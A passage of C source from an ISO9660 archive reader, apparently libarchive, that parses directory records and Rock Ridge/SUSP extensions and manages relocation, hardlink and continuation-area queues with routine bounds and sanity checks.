if (fsize != 0 && location < 0) {
archive_set_error(&a->archive, ARCHIVE_ERRNO_MISC,
"Invalid location of extent of file");
return (NULL);
}
/* Sanity check that this entry does not create a cycle. */
offset = iso9660->logical_block_size * (uint64_t)location;
for (filep = parent; filep != NULL; filep = filep->parent) {
if (filep->offset == offset) {
archive_set_error(&a->archive, ARCHIVE_ERRNO_FILE_FORMAT,
"Directory structure contains loop");
return (NULL);
}
}
/* Create a new file entry and copy data from the ISO dir record. */
file = (struct file_info *)calloc(1, sizeof(*file));
if (file == NULL) {
archive_set_error(&a->archive, ENOMEM,
"No memory for file entry");
return (NULL);
}
file->parent = parent;
file->offset = offset;
file->size = fsize;
file->mtime = isodate7(isodirrec + DR_date_offset);
file->ctime = file->atime = file->mtime;
file->rede_files.first = NULL;
file->rede_files.last = &(file->rede_files.first);
p = isodirrec + DR_name_offset;
/* Rockridge extensions (if any) follow name. Compute this
* before fidgeting the name_len below. */
rr_start = p + name_len + (name_len & 1 ? 0 : 1);
rr_end = isodirrec + dr_len;
if (iso9660->seenJoliet) {
/* Joliet names are at most 64 characters (128 bytes) according to
* the spec, but genisoimage/mkisofs can record longer Joliet names
* of up to 103 UCS-2 characters (206 bytes) via their
* '-joliet-long' option.
*/
if (name_len > 206)
name_len = 206;
name_len &= ~1;
/* trim trailing first version and dot from filename.
*
* Remember we were in UTF-16BE land!
* SEPARATOR 1 (.) and SEPARATOR 2 (;) are both
* 16 bits big endian characters on Joliet.
*
* TODO: sanitize filename?
* Joliet allows any UCS-2 char except:
* *, /, :, ;, ? and \.
*/
/* Chop off trailing ';1' from files. */
if (name_len > 4 && p[name_len-4] == 0 && p[name_len-3] == ';'
&& p[name_len-2] == 0 && p[name_len-1] == '1')
name_len -= 4;
#if 0 /* XXX: this somehow manages to strip off single-character file extensions, like '.c'. */
/* Chop off trailing '.' from filenames. */
if (name_len > 2 && p[name_len-2] == 0 && p[name_len-1] == '.')
name_len -= 2;
#endif
if ((file->utf16be_name = malloc(name_len)) == NULL) {
archive_set_error(&a->archive, ENOMEM,
"No memory for file name");
/* The entry has not been registered anywhere yet, so it is safe to free. */
free(file);
return (NULL);
}
memcpy(file->utf16be_name, p, name_len);
file->utf16be_bytes = name_len;
} else {
/* Chop off trailing ';1' from files. */
if (name_len > 2 && p[name_len - 2] == ';' &&
p[name_len - 1] == '1')
name_len -= 2;
/* Chop off trailing '.' from filenames. */
if (name_len > 1 && p[name_len - 1] == '.')
--name_len;
archive_strncpy(&file->name, (const char *)p, name_len);
}
flags = isodirrec[DR_flags_offset];
if (flags & 0x02)
file->mode = AE_IFDIR | 0700;
else
file->mode = AE_IFREG | 0400;
if (flags & 0x80)
file->multi_extent = 1;
else
file->multi_extent = 0;
/*
* Use the location as the file number, which is treated as an inode
* number to find hardlink targets. If Rock Ridge extensions are
* being used, the file number will be overwritten by the FILE SERIAL
* NUMBER of the RRIP "PX" extension.
* Note: Old mkisofs did not record that FILE SERIAL NUMBER
* in ISO images.
* Note 2: xorriso sets the location of a symlink file to 0.
*/
if (file->size == 0 && location >= 0) {
/* If file->size is zero, its location points at the wrong
* place, so we should not use it for the file number.
* When the location is negative, it can still be used
* for the file number.
*/
file->number = -1;
/* Do not appear before any directory entries. */
file->offset = -1;
} else
file->number = (int64_t)(uint32_t)location;
/* Rockridge extensions overwrite information from above. */
if (iso9660->opt_support_rockridge) {
if (parent == NULL && rr_end - rr_start >= 7) {
p = rr_start;
if (memcmp(p, "SP\x07\x01\xbe\xef", 6) == 0) {
/*
* SP extension stores the suspOffset
* (Number of bytes to skip between
* filename and SUSP records.)
* It is mandatory by the SUSP standard
* (IEEE 1281).
*
* It allows SUSP to coexist with
* non-SUSP uses of the System
* Use Area by placing non-SUSP data
* before SUSP data.
*
* SP extension must be in the root
* directory entry, disable all SUSP
* processing if not found.
*/
iso9660->suspOffset = p[6];
iso9660->seenSUSP = 1;
rr_start += 7;
}
}
if (iso9660->seenSUSP) {
int r;
file->name_continues = 0;
file->symlink_continues = 0;
rr_start += iso9660->suspOffset;
r = parse_rockridge(a, file, rr_start, rr_end);
if (r != ARCHIVE_OK) {
free(file);
return (NULL);
}
/*
* In ISO images made by makefs, the size of a symbolic
* link is not zero and its location is the same as that
* of the next regular file. That looks like a hardlink
* and causes unexpected errors, so clear the size and
* number here.
*/
if (file->size > 0 &&
(file->mode & AE_IFMT) == AE_IFLNK) {
file->size = 0;
file->number = -1;
file->offset = -1;
}
} else
/* If there isn't SUSP, disable parsing
* rock ridge extensions. */
iso9660->opt_support_rockridge = 0;
}
file->nlinks = 1;/* Reset nlink. we'll calculate it later. */
/* Tell file's parent how many children that parent has. */
if (parent != NULL && (flags & 0x02))
parent->subdirs++;
if (iso9660->seenRockridge) {
if (parent != NULL && parent->parent == NULL &&
(flags & 0x02) && iso9660->rr_moved == NULL &&
file->name.s &&
(strcmp(file->name.s, "rr_moved") == 0 ||
strcmp(file->name.s, ".rr_moved") == 0)) {
iso9660->rr_moved = file;
file->rr_moved = 1;
file->rr_moved_has_re_only = 1;
file->re = 0;
parent->subdirs--;
} else if (file->re) {
/*
* Sanity check: file's parent is rr_moved.
*/
if (parent == NULL || parent->rr_moved == 0) {
archive_set_error(&a->archive,
ARCHIVE_ERRNO_MISC,
"Invalid Rockridge RE");
return (NULL);
}
/*
* Sanity check: file does not have "CL" extension.
*/
if (file->cl_offset) {
archive_set_error(&a->archive,
ARCHIVE_ERRNO_MISC,
"Invalid Rockridge RE and CL");
return (NULL);
}
/*
* Sanity check: The file type must be a directory.
*/
if ((flags & 0x02) == 0) {
archive_set_error(&a->archive,
ARCHIVE_ERRNO_MISC,
"Invalid Rockridge RE");
return (NULL);
}
} else if (parent != NULL && parent->rr_moved)
file->rr_moved_has_re_only = 0;
else if (parent != NULL && (flags & 0x02) &&
(parent->re || parent->re_descendant))
file->re_descendant = 1;
if (file->cl_offset) {
struct file_info *r;
if (parent == NULL || parent->parent == NULL) {
archive_set_error(&a->archive,
ARCHIVE_ERRNO_MISC,
"Invalid Rockridge CL");
return (NULL);
}
/*
* Sanity check: The file type must be a regular file.
*/
if ((flags & 0x02) != 0) {
archive_set_error(&a->archive,
ARCHIVE_ERRNO_MISC,
"Invalid Rockridge CL");
return (NULL);
}
parent->subdirs++;
/* Overwrite this "CL" entry's offset and number so that it
* appears before other directories. The "+1" makes sure it
* still appears after the "RE" entry that this "CL" entry
* should be connected with. */
file->offset = file->number = file->cl_offset + 1;
/*
* Sanity check: cl_offset does not point at any of its
* parents or at itself.
*/
for (r = parent; r; r = r->parent) {
if (r->offset == file->cl_offset) {
archive_set_error(&a->archive,
ARCHIVE_ERRNO_MISC,
"Invalid Rockridge CL");
return (NULL);
}
}
if (file->cl_offset == file->offset ||
parent->rr_moved) {
archive_set_error(&a->archive,
ARCHIVE_ERRNO_MISC,
"Invalid Rockridge CL");
return (NULL);
}
}
}
#if DEBUG
/* DEBUGGING: Warn about attributes I don't yet fully support. */
if ((flags & ~0x02) != 0) {
fprintf(stderr, "\n ** Unrecognized flag: ");
dump_isodirrec(stderr, isodirrec);
fprintf(stderr, "\n");
} else if (toi(isodirrec + DR_volume_sequence_number_offset, 2) != 1) {
fprintf(stderr, "\n ** Unrecognized sequence number: ");
dump_isodirrec(stderr, isodirrec);
fprintf(stderr, "\n");
} else if (*(isodirrec + DR_file_unit_size_offset) != 0) {
fprintf(stderr, "\n ** Unexpected file unit size: ");
dump_isodirrec(stderr, isodirrec);
fprintf(stderr, "\n");
} else if (*(isodirrec + DR_interleave_offset) != 0) {
fprintf(stderr, "\n ** Unexpected interleave: ");
dump_isodirrec(stderr, isodirrec);
fprintf(stderr, "\n");
} else if (*(isodirrec + DR_ext_attr_length_offset) != 0) {
fprintf(stderr, "\n ** Unexpected extended attribute length: ");
dump_isodirrec(stderr, isodirrec);
fprintf(stderr, "\n");
}
#endif
register_file(iso9660, file);
return (file);
}
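/* Walk a System Use area (or a "CE" continuation area) and dispatch
 * each SUSP/Rock Ridge entry -- CE, CL, NM, PN, PX, RE, SL, ST, TF,
 * ZF and friends -- to its handler, updating 'file' in place. */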
static int
parse_rockridge(struct archive_read *a, struct file_info *file,
const unsigned char *p, const unsigned char *end)
{
struct iso9660 *iso9660;
iso9660 = (struct iso9660 *)(a->format->data);
while (p + 4 <= end /* Enough space for another entry. */
&& p[0] >= 'A' && p[0] <= 'Z' /* Sanity-check 1st char of name. */
&& p[1] >= 'A' && p[1] <= 'Z' /* Sanity-check 2nd char of name. */
&& p[2] >= 4 /* Sanity-check length. */
&& p + p[2] <= end) { /* Sanity-check length. */
const unsigned char *data = p + 4;
int data_length = p[2] - 4;
int version = p[3];
switch(p[0]) {
case 'C':
if (p[1] == 'E') {
if (version == 1 && data_length == 24) {
/*
* CE extension comprises:
* 8 byte sector containing extension
* 8 byte offset w/in above sector
* 8 byte length of continuation
*/
int32_t location =
archive_le32dec(data);
file->ce_offset =
archive_le32dec(data+8);
file->ce_size =
archive_le32dec(data+16);
if (register_CE(a, location, file)
!= ARCHIVE_OK)
return (ARCHIVE_FATAL);
}
}
else if (p[1] == 'L') {
if (version == 1 && data_length == 8) {
file->cl_offset = (uint64_t)
iso9660->logical_block_size *
(uint64_t)archive_le32dec(data);
iso9660->seenRockridge = 1;
}
}
break;
case 'N':
if (p[1] == 'M') {
if (version == 1) {
parse_rockridge_NM1(file,
data, data_length);
iso9660->seenRockridge = 1;
}
}
break;
case 'P':
/*
* PD extension is padding;
* contents are always ignored.
*
* PL extension won't appear;
* contents are always ignored.
*/
if (p[1] == 'N') {
if (version == 1 && data_length == 16) {
file->rdev = toi(data,4);
file->rdev <<= 32;
file->rdev |= toi(data + 8, 4);
iso9660->seenRockridge = 1;
}
}
else if (p[1] == 'X') {
/*
* PX extension comprises:
* 8 bytes for mode,
* 8 bytes for nlinks,
* 8 bytes for uid,
* 8 bytes for gid,
* 8 bytes for inode.
*/
if (version == 1) {
if (data_length >= 8)
file->mode
= toi(data, 4);
if (data_length >= 16)
file->nlinks
= toi(data + 8, 4);
if (data_length >= 24)
file->uid
= toi(data + 16, 4);
if (data_length >= 32)
file->gid
= toi(data + 24, 4);
if (data_length >= 40)
file->number
= toi(data + 32, 4);
iso9660->seenRockridge = 1;
}
}
break;
case 'R':
if (p[1] == 'E' && version == 1) {
file->re = 1;
iso9660->seenRockridge = 1;
}
else if (p[1] == 'R' && version == 1) {
/*
* RR extension comprises:
* one byte flag value
* This extension is obsolete,
* so contents are always ignored.
*/
}
break;
case 'S':
if (p[1] == 'L') {
if (version == 1) {
parse_rockridge_SL1(file,
data, data_length);
iso9660->seenRockridge = 1;
}
}
else if (p[1] == 'T'
&& data_length == 0 && version == 1) {
/*
* ST extension marks end of this
* block of SUSP entries.
*
* It allows SUSP to coexist with
* non-SUSP uses of the System
* Use Area by placing non-SUSP data
* after SUSP data.
*/
iso9660->seenSUSP = 0;
iso9660->seenRockridge = 0;
return (ARCHIVE_OK);
}
break;
case 'T':
if (p[1] == 'F') {
if (version == 1) {
parse_rockridge_TF1(file,
data, data_length);
iso9660->seenRockridge = 1;
}
}
break;
case 'Z':
if (p[1] == 'F') {
if (version == 1)
parse_rockridge_ZF1(file,
data, data_length);
}
break;
default:
break;
}
p += p[2];
}
return (ARCHIVE_OK);
}
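/* Queue a RRIP "CE" continuation area for later reading. Requests are
 * kept in a binary min-heap ordered by on-disk offset so read_CE() can
 * consume them in a single forward pass over the input. */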
static int
register_CE(struct archive_read *a, int32_t location,
struct file_info *file)
{
struct iso9660 *iso9660;
struct read_ce_queue *heap;
struct read_ce_req *p;
uint64_t offset, parent_offset;
int hole, parent;
iso9660 = (struct iso9660 *)(a->format->data);
offset = ((uint64_t)location) * (uint64_t)iso9660->logical_block_size;
if (((file->mode & AE_IFMT) == AE_IFREG &&
offset >= file->offset) ||
offset < iso9660->current_position ||
(((uint64_t)file->ce_offset) + file->ce_size)
> (uint64_t)iso9660->logical_block_size ||
offset + file->ce_offset + file->ce_size
> iso9660->volume_size) {
archive_set_error(&a->archive, ARCHIVE_ERRNO_MISC,
"Invalid parameter in SUSP \"CE\" extension");
return (ARCHIVE_FATAL);
}
/* Expand our CE list as necessary. */
heap = &(iso9660->read_ce_req);
if (heap->cnt >= heap->allocated) {
int new_size;
if (heap->allocated < 16)
new_size = 16;
else
new_size = heap->allocated * 2;
/* Overflow might keep us from growing the list. */
if (new_size <= heap->allocated) {
archive_set_error(&a->archive, ENOMEM, "Out of memory");
return (ARCHIVE_FATAL);
}
p = calloc(new_size, sizeof(p[0]));
if (p == NULL) {
archive_set_error(&a->archive, ENOMEM, "Out of memory");
return (ARCHIVE_FATAL);
}
if (heap->reqs != NULL) {
memcpy(p, heap->reqs, heap->cnt * sizeof(*p));
free(heap->reqs);
}
heap->reqs = p;
heap->allocated = new_size;
}
/*
* Start with hole at end, walk it up tree to find insertion point.
*/
hole = heap->cnt++;
while (hole > 0) {
parent = (hole - 1)/2;
parent_offset = heap->reqs[parent].offset;
if (offset >= parent_offset) {
heap->reqs[hole].offset = offset;
heap->reqs[hole].file = file;
return (ARCHIVE_OK);
}
/* Move parent into hole <==> move hole up tree. */
heap->reqs[hole] = heap->reqs[parent];
hole = parent;
}
heap->reqs[0].offset = offset;
heap->reqs[0].file = file;
return (ARCHIVE_OK);
}
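/* Remove the smallest-offset request from the CE heap and restore the
 * heap property by sifting the new root down. */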
static void
next_CE(struct read_ce_queue *heap)
{
uint64_t a_offset, b_offset, c_offset;
int a, b, c;
struct read_ce_req tmp;
if (heap->cnt < 1)
return;
/*
* Move the last item in the heap to the root of the tree
*/
heap->reqs[0] = heap->reqs[--(heap->cnt)];
/*
* Rebalance the heap.
*/
a = 0; /* Starting element and its offset */
a_offset = heap->reqs[a].offset;
for (;;) {
b = a + a + 1; /* First child */
if (b >= heap->cnt)
return;
b_offset = heap->reqs[b].offset;
c = b + 1; /* Use second child if it is smaller. */
if (c < heap->cnt) {
c_offset = heap->reqs[c].offset;
if (c_offset < b_offset) {
b = c;
b_offset = c_offset;
}
}
if (a_offset <= b_offset)
return;
tmp = heap->reqs[a];
heap->reqs[a] = heap->reqs[b];
heap->reqs[b] = tmp;
a = b;
}
}
static int
read_CE(struct archive_read *a, struct iso9660 *iso9660)
{
struct read_ce_queue *heap;
const unsigned char *b, *p, *end;
struct file_info *file;
size_t step;
int r;
/* Read the data that RRIP "CE" extensions point to. */
heap = &(iso9660->read_ce_req);
step = iso9660->logical_block_size;
while (heap->cnt &&
heap->reqs[0].offset == iso9660->current_position) {
b = __archive_read_ahead(a, step, NULL);
if (b == NULL) {
archive_set_error(&a->archive,
ARCHIVE_ERRNO_MISC,
"Failed to read full block when scanning "
"ISO9660 directory list");
return (ARCHIVE_FATAL);
}
do {
file = heap->reqs[0].file;
if (file->ce_offset + file->ce_size > step) {
archive_set_error(&a->archive,
ARCHIVE_ERRNO_FILE_FORMAT,
"Malformed CE information");
return (ARCHIVE_FATAL);
}
p = b + file->ce_offset;
end = p + file->ce_size;
next_CE(heap);
r = parse_rockridge(a, file, p, end);
if (r != ARCHIVE_OK)
return (ARCHIVE_FATAL);
} while (heap->cnt &&
heap->reqs[0].offset == iso9660->current_position);
/* NOTE: Do not move this consume code to the front of the
* do-while loop. Registering a nested CE extension could
* fail because of the current position. */
__archive_read_consume(a, step);
iso9660->current_position += step;
}
return (ARCHIVE_OK);
}
static void
parse_rockridge_NM1(struct file_info *file,
const unsigned char *data, int data_length)
{
if (!file->name_continues)
archive_string_empty(&file->name);
file->name_continues = 0;
if (data_length < 1)
return;
/*
* NM version 1 extension comprises:
* 1 byte flag, value is one of:
* = 0: remainder is name
* = 1: remainder is name, next NM entry continues name
* = 2: "."
* = 4: ".."
* = 32: Implementation specific
* All other values are reserved.
*/
switch(data[0]) {
case 0:
if (data_length < 2)
return;
archive_strncat(&file->name,
(const char *)data + 1, data_length - 1);
break;
case 1:
if (data_length < 2)
return;
archive_strncat(&file->name,
(const char *)data + 1, data_length - 1);
file->name_continues = 1;
break;
case 2:
archive_strcat(&file->name, ".");
break;
case 4:
archive_strcat(&file->name, "..");
break;
default:
return;
}
}
static void
parse_rockridge_TF1(struct file_info *file, const unsigned char *data,
int data_length)
{
char flag;
/*
* TF extension comprises:
* one byte flag
* create time (optional)
* modify time (optional)
* access time (optional)
* attribute time (optional)
* Time format and presence of fields
* is controlled by flag bits.
*/
if (data_length < 1)
return;
flag = data[0];
++data;
--data_length;
if (flag & 0x80) {
/* Use 17-byte time format. */
if ((flag & 1) && data_length >= 17) {
/* Create time. */
file->birthtime_is_set = 1;
file->birthtime = isodate17(data);
data += 17;
data_length -= 17;
}
if ((flag & 2) && data_length >= 17) {
/* Modify time. */
file->mtime = isodate17(data);
data += 17;
data_length -= 17;
}
if ((flag & 4) && data_length >= 17) {
/* Access time. */
file->atime = isodate17(data);
data += 17;
data_length -= 17;
}
if ((flag & 8) && data_length >= 17) {
/* Attribute change time. */
file->ctime = isodate17(data);
}
} else {
/* Use 7-byte time format. */
if ((flag & 1) && data_length >= 7) {
/* Create time. */
file->birthtime_is_set = 1;
file->birthtime = isodate7(data);
data += 7;
data_length -= 7;
}
if ((flag & 2) && data_length >= 7) {
/* Modify time. */
file->mtime = isodate7(data);
data += 7;
data_length -= 7;
}
if ((flag & 4) && data_length >= 7) {
/* Access time. */
file->atime = isodate7(data);
data += 7;
data_length -= 7;
}
if ((flag & 8) && data_length >= 7) {
/* Attribute change time. */
file->ctime = isodate7(data);
}
}
}
static void
parse_rockridge_SL1(struct file_info *file, const unsigned char *data,
int data_length)
{
const char *separator = "";
if (!file->symlink_continues || file->symlink.length < 1)
archive_string_empty(&file->symlink);
file->symlink_continues = 0;
/*
* Defined flag values:
* 0: This is the last SL record for this symbolic link
* 1: this symbolic link field continues in next SL entry
* All other values are reserved.
*/
if (data_length < 1)
return;
switch(*data) {
case 0:
break;
case 1:
file->symlink_continues = 1;
break;
default:
return;
}
++data; /* Skip flag byte. */
--data_length;
/*
* SL extension body stores "components".
* Basically, this is a complicated way of storing
* a POSIX path. It also interferes with using
* symlinks for storing non-path data. <sigh>
*
* Each component is 2 bytes (flag and length)
* possibly followed by name data.
*/
while (data_length >= 2) {
unsigned char flag = *data++;
unsigned char nlen = *data++;
data_length -= 2;
archive_strcat(&file->symlink, separator);
separator = "/";
switch(flag) {
case 0: /* Usual case, this is text. */
if (data_length < nlen)
return;
archive_strncat(&file->symlink,
(const char *)data, nlen);
break;
case 0x01: /* Text continues in next component. */
if (data_length < nlen)
return;
archive_strncat(&file->symlink,
(const char *)data, nlen);
separator = "";
break;
case 0x02: /* Current dir. */
archive_strcat(&file->symlink, ".");
break;
case 0x04: /* Parent dir. */
archive_strcat(&file->symlink, "..");
break;
case 0x08: /* Root of filesystem. */
archive_strcat(&file->symlink, "/");
separator = "";
break;
case 0x10: /* Undefined (historically "volume root") */
archive_string_empty(&file->symlink);
archive_strcat(&file->symlink, "ROOT");
break;
case 0x20: /* Undefined (historically "hostname") */
archive_strcat(&file->symlink, "hostname");
break;
default:
/* TODO: issue a warning ? */
return;
}
data += nlen;
data_length -= nlen;
}
}
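/*
 * Illustrative sketch: an SL record whose components are "root of
 * filesystem" followed by the text "usr" reconstructs the target
 * "/usr".  The bytes are hypothetical and kept under "#if 0".
 */
#if 0
static void
example_parse_SL_absolute_target(struct file_info *file)
{
	static const unsigned char sl[] = {
		0x00,				/* SL flag: last SL record */
		0x08, 0x00,			/* component: root of filesystem */
		0x00, 0x03, 'u', 's', 'r'	/* component: text "usr" */
	};

	parse_rockridge_SL1(file, sl, (int)sizeof(sl));
	/* file->symlink now holds "/usr". */
}
#endif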
static void
parse_rockridge_ZF1(struct file_info *file, const unsigned char *data,
int data_length)
{
if (data[0] == 0x70 && data[1] == 0x7a && data_length == 12) {
/* paged zlib */
file->pz = 1;
file->pz_log2_bs = data[3];
file->pz_uncompressed_size = archive_le32dec(&data[4]);
}
}
static void
register_file(struct iso9660 *iso9660, struct file_info *file)
{
file->use_next = iso9660->use_files;
iso9660->use_files = file;
}
static void
release_files(struct iso9660 *iso9660)
{
struct content *con, *connext;
struct file_info *file;
file = iso9660->use_files;
while (file != NULL) {
struct file_info *next = file->use_next;
archive_string_free(&file->name);
archive_string_free(&file->symlink);
free(file->utf16be_name);
con = file->contents.first;
while (con != NULL) {
connext = con->next;
free(con);
con = connext;
}
free(file);
file = next;
}
}
static int
next_entry_seek(struct archive_read *a, struct iso9660 *iso9660,
struct file_info **pfile)
{
struct file_info *file;
int r;
r = next_cache_entry(a, iso9660, pfile);
if (r != ARCHIVE_OK)
return (r);
file = *pfile;
/* Don't waste time seeking for zero-length bodies. */
if (file->size == 0)
file->offset = iso9660->current_position;
/* flush any remaining bytes from the last round to ensure
* we're positioned */
if (iso9660->entry_bytes_unconsumed) {
__archive_read_consume(a, iso9660->entry_bytes_unconsumed);
iso9660->entry_bytes_unconsumed = 0;
}
/* Seek forward to the start of the entry. */
if (iso9660->current_position < file->offset) {
int64_t step;
step = file->offset - iso9660->current_position;
step = __archive_read_consume(a, step);
if (step < 0)
return ((int)step);
iso9660->current_position = file->offset;
}
/* We found body of file; handle it now. */
return (ARCHIVE_OK);
}
static int
next_cache_entry(struct archive_read *a, struct iso9660 *iso9660,
struct file_info **pfile)
{
struct file_info *file;
struct {
struct file_info *first;
struct file_info **last;
} empty_files;
int64_t number;
int count;
file = cache_get_entry(iso9660);
if (file != NULL) {
*pfile = file;
return (ARCHIVE_OK);
}
for (;;) {
struct file_info *re, *d;
*pfile = file = next_entry(iso9660);
if (file == NULL) {
/*
 * If directory entries which are all descendants of
 * rr_moved still remain, expose them.
 */
if (iso9660->re_files.first != NULL &&
iso9660->rr_moved != NULL &&
iso9660->rr_moved->rr_moved_has_re_only)
/* Expose "rr_moved" entry. */
cache_add_entry(iso9660, iso9660->rr_moved);
while ((re = re_get_entry(iso9660)) != NULL) {
/* Expose its descendant dirs. */
while ((d = rede_get_entry(re)) != NULL)
cache_add_entry(iso9660, d);
}
if (iso9660->cache_files.first != NULL)
return (next_cache_entry(a, iso9660, pfile));
return (ARCHIVE_EOF);
}
if (file->cl_offset) {
struct file_info *first_re = NULL;
int nexted_re = 0;
/*
* Find "RE" dir for the current file, which
* has "CL" flag.
*/
while ((re = re_get_entry(iso9660))
!= first_re) {
if (first_re == NULL)
first_re = re;
if (re->offset == file->cl_offset) {
re->parent->subdirs--;
re->parent = file->parent;
re->re = 0;
if (re->parent->re_descendant) {
nexted_re = 1;
re->re_descendant = 1;
if (rede_add_entry(re) < 0)
goto fatal_rr;
/* Move a list of descendants
* to a new ancestor. */
while ((d = rede_get_entry(
re)) != NULL)
if (rede_add_entry(d)
< 0)
goto fatal_rr;
break;
}
/* Replace the current file
* with "RE" dir */
*pfile = file = re;
/* Expose its descendant */
while ((d = rede_get_entry(
file)) != NULL)
cache_add_entry(
iso9660, d);
break;
} else
re_add_entry(iso9660, re);
}
if (nexted_re) {
/*
* Do not expose this at this time
* because we have not gotten its full-path
* name yet.
*/
continue;
}
} else if ((file->mode & AE_IFMT) == AE_IFDIR) {
int r;
/* Read file entries in this dir. */
r = read_children(a, file);
if (r != ARCHIVE_OK)
return (r);
/*
* Handle a special dir of Rockridge extensions,
* "rr_moved".
*/
if (file->rr_moved) {
/*
* If this has only the subdirectories which
* have "RE" flags, do not expose at this time.
*/
if (file->rr_moved_has_re_only)
continue;
/* Otherwise expose "rr_moved" entry. */
} else if (file->re) {
/*
* Do not expose this at this time
* because we have not gotten its full-path
* name yet.
*/
re_add_entry(iso9660, file);
continue;
} else if (file->re_descendant) {
/*
* If the top level "RE" entry of this entry
* is not exposed, we, accordingly, should not
* expose this entry at this time because
* we cannot make its proper full-path name.
*/
if (rede_add_entry(file) == 0)
continue;
/* Otherwise we can expose this entry because
* it seems its top level "RE" has already been
* exposed. */
}
}
break;
}
if ((file->mode & AE_IFMT) != AE_IFREG || file->number == -1)
return (ARCHIVE_OK);
count = 0;
number = file->number;
iso9660->cache_files.first = NULL;
iso9660->cache_files.last = &(iso9660->cache_files.first);
empty_files.first = NULL;
empty_files.last = &empty_files.first;
/* Collect files which have the same file serial number.
 * Peek pending_files so that a file whose number is different
 * is not put back. */
while (iso9660->pending_files.used > 0 &&
(iso9660->pending_files.files[0]->number == -1 ||
iso9660->pending_files.files[0]->number == number)) {
if (file->number == -1) {
/* This file has the same offset, but it is the
 * bogus offset that empty files and symlink
 * files have.
 * NOTE: This wrong offset was recorded by old
 * mkisofs utilities. If the ISO image was
 * created by a recent mkisofs, this does not
 * happen.
 */
file->next = NULL;
*empty_files.last = file;
empty_files.last = &(file->next);
} else {
count++;
cache_add_entry(iso9660, file);
}
file = next_entry(iso9660);
}
if (count == 0) {
*pfile = file;
return ((file == NULL)?ARCHIVE_EOF:ARCHIVE_OK);
}
if (file->number == -1) {
file->next = NULL;
*empty_files.last = file;
empty_files.last = &(file->next);
} else {
count++;
cache_add_entry(iso9660, file);
}
if (count > 1) {
/* The count equals the number of hardlinks,
 * so the nlinks field of each file in cache_files
 * is overwritten with that count.
 */
for (file = iso9660->cache_files.first;
file != NULL; file = file->next)
file->nlinks = count;
}
/* If there are empty files, those files are appended
 * to the tail of cache_files. */
if (empty_files.first != NULL) {
*iso9660->cache_files.last = empty_files.first;
iso9660->cache_files.last = empty_files.last;
}
*pfile = cache_get_entry(iso9660);
return ((*pfile == NULL)?ARCHIVE_EOF:ARCHIVE_OK);
fatal_rr:
archive_set_error(&a->archive, ARCHIVE_ERRNO_MISC,
"Failed to connect 'CL' pointer to 'RE' rr_moved pointer of "
"Rockridge extensions: current position = %jd, CL offset = %jd",
(intmax_t)iso9660->current_position, (intmax_t)file->cl_offset);
return (ARCHIVE_FATAL);
}
static inline void
re_add_entry(struct iso9660 *iso9660, struct file_info *file)
{
file->re_next = NULL;
*iso9660->re_files.last = file;
iso9660->re_files.last = &(file->re_next);
}
static inline struct file_info *
re_get_entry(struct iso9660 *iso9660)
{
struct file_info *file;
if ((file = iso9660->re_files.first) != NULL) {
iso9660->re_files.first = file->re_next;
if (iso9660->re_files.first == NULL)
iso9660->re_files.last =
&(iso9660->re_files.first);
}
return (file);
}
static inline int
rede_add_entry(struct file_info *file)
{
struct file_info *re;
/*
* Find "RE" entry.
*/
re = file->parent;
while (re != NULL && !re->re)
re = re->parent;
if (re == NULL)
return (-1);
file->re_next = NULL;
*re->rede_files.last = file;
re->rede_files.last = &(file->re_next);
return (0);
}
static inline struct file_info *
rede_get_entry(struct file_info *re)
{
struct file_info *file;
if ((file = re->rede_files.first) != NULL) {
re->rede_files.first = file->re_next;
if (re->rede_files.first == NULL)
re->rede_files.last =
&(re->rede_files.first);
}
return (file);
}
static inline void
cache_add_entry(struct iso9660 *iso9660, struct file_info *file)
{
file->next = NULL;
*iso9660->cache_files.last = file;
iso9660->cache_files.last = &(file->next);
}
static inline struct file_info *
cache_get_entry(struct iso9660 *iso9660)
{
struct file_info *file;
if ((file = iso9660->cache_files.first) != NULL) {
iso9660->cache_files.first = file->next;
if (iso9660->cache_files.first == NULL)
iso9660->cache_files.last =
&(iso9660->cache_files.first);
}
return (file);
}
static int
heap_add_entry(struct archive_read *a, struct heap_queue *heap,
struct file_info *file, uint64_t key)
{
uint64_t file_key, parent_key;
int hole, parent;
/* Expand our pending files list as necessary. */
if (heap->used >= heap->allocated) {
struct file_info **new_pending_files;
int new_size = heap->allocated * 2;
if (heap->allocated < 1024)
new_size = 1024;
/* Overflow might keep us from growing the list. */
if (new_size <= heap->allocated) {
archive_set_error(&a->archive,
ENOMEM, "Out of memory");
return (ARCHIVE_FATAL);
}
new_pending_files = (struct file_info **)
malloc(new_size * sizeof(new_pending_files[0]));
if (new_pending_files == NULL) {
archive_set_error(&a->archive,
ENOMEM, "Out of memory");
return (ARCHIVE_FATAL);
}
memcpy(new_pending_files, heap->files,
heap->allocated * sizeof(new_pending_files[0]));
if (heap->files != NULL)
free(heap->files);
heap->files = new_pending_files;
heap->allocated = new_size;
}
file_key = file->key = key;
/*
* Start with hole at end, walk it up tree to find insertion point.
*/
hole = heap->used++;
while (hole > 0) {
parent = (hole - 1)/2;
parent_key = heap->files[parent]->key;
if (file_key >= parent_key) {
heap->files[hole] = file;
return (ARCHIVE_OK);
}
/* Move parent into hole <==> move hole up tree. */
heap->files[hole] = heap->files[parent];
hole = parent;
}
heap->files[0] = file;
return (ARCHIVE_OK);
}
static struct file_info *
heap_get_entry(struct heap_queue *heap)
{
uint64_t a_key, b_key, c_key;
int a, b, c;
struct file_info *r, *tmp;
if (heap->used < 1)
return (NULL);
/*
* The first file in the list is the earliest; we'll return this.
*/
r = heap->files[0];
/*
* Move the last item in the heap to the root of the tree
*/
heap->files[0] = heap->files[--(heap->used)];
/*
* Rebalance the heap.
*/
a = 0; /* Starting element and its heap key */
a_key = heap->files[a]->key;
for (;;) {
b = a + a + 1; /* First child */
if (b >= heap->used)
return (r);
b_key = heap->files[b]->key;
c = b + 1; /* Use second child if it is smaller. */
if (c < heap->used) {
c_key = heap->files[c]->key;
if (c_key < b_key) {
b = c;
b_key = c_key;
}
}
if (a_key <= b_key)
return (r);
tmp = heap->files[a];
heap->files[a] = heap->files[b];
heap->files[b] = tmp;
a = b;
}
}
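/*
 * Illustrative sketch: heap_add_entry() and heap_get_entry() keep a
 * binary min-heap in a flat array, where the parent of slot i is
 * (i - 1) / 2 and its children are 2 * i + 1 and 2 * i + 2.  The check
 * below is hypothetical, assumes <assert.h>, and is kept under "#if 0".
 */
#if 0
static void
example_heap_index_math(void)
{
	int i = 5;

	assert((i - 1) / 2 == 2);	/* parent of slot 5 */
	assert(2 * i + 1 == 11);	/* left child of slot 5 */
	assert(2 * i + 2 == 12);	/* right child of slot 5 */
}
#endif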
static unsigned int
